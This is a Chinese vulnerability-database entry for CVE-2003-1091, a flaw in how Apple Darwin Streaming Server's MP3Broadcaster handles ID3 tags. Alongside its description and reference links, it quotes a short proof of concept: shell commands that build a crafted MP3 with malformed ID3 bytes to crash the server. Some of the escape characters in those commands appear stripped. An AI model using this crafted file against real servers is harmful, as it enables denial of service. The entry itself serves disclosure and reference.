Apple QuickTime/Darwin流MP3Broadcaster ID3标记处理漏洞-安全小百科

Apple QuickTime/Darwin流MP3Broadcaster ID3标记处理漏洞

漏洞ID	1107341	漏洞类型	边界条件错误
发布时间	2003-05-22	更新时间	2005-10-20
CVE编号	CVE-2003-1091	CNNVD-ID	CNNVD-200312-258
漏洞平台	OSX	CVSS评分	7.5

|漏洞来源

https://www.exploit-db.com/exploits/22630
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-258

|漏洞详情

MP3Broadcaster是Darwin流服务程序包含的MP3广播程序。MP3Broadcaster不正确处理而已ID3标记，远程攻击者可以利用这个漏洞构建恶意MP3文件，触发基于整数的缓冲区溢出，可对服务程序进行拒绝服务攻击。DarwinStreamingServer(DSS)是流服务器技术可允许使用标准RTP和RTSP协议发送QuickTime数据给客户端，包含的MP3Broadcaster工具在处理ID3标记时没有正确检查边界，恶意的MP3文件可导致MP3Broadcaster发生段错误。

|漏洞EXP

source: http://www.securityfocus.com/bid/7660/info

MP3Broadcaster is shipped as part of Darwin Streaming Server software.

MP3Broadcaster has been reported prone to a vulnerability when processing malicious ID3 tags. This is likely due to insufficient sanity checks performed when handling signed integer values contained within MP3 file ID3 tags.

First create the sample configuration file:
$ echo -e "n" > test.conf

Then create a playlist file:
$ echo -e "*PLAY-LIST*nsong.mp3" > mp3playlist.ply

Create a specially crafted mp3 file:
$ echo -e
"ID3x03x00x00x00x00x0fx0fTPE1xffxaaxaaxbbx00x00x00x00x00x00

" > song.mp3

|参考资料

来源:US-CERTVulnerabilityNote:VU#148564
名称:VU#148564
链接:http://www.kb.cert.org/vuls/id/148564
来源:XF
名称:darwin-mp3broadcaster-code-execution(12054)
链接:http://xforce.iss.net/xforce/xfdb/12054
来源:BID
名称:7660
链接:http://www.securityfocus.com/bid/7660
来源:SECTRACK
名称:1006822
链接:http://securitytracker.com/id?1006822
来源:BUGTRAQ
名称:20030522QuickTime/DarwinStreamingServersecurityissues
链接:http://archives.neohapsis.com/archives/bugtraq/2003-05/0245.html
来源：NSFOCUS
名称：4873
链接：http://www.nsfocus.net/vulndb/4873

相关推荐: Microsoft Internet Explorer强制脚本执行漏洞

Microsoft Internet Explorer强制脚本执行漏洞漏洞ID 1204649 漏洞类型设计错误发布时间 2002-03-08 更新时间 2005-05-02 CVE编号 CVE-2002-0026 CNNVD-ID CNNVD-2002…

文章版权归作者所有，未经允许请勿转载。

THE END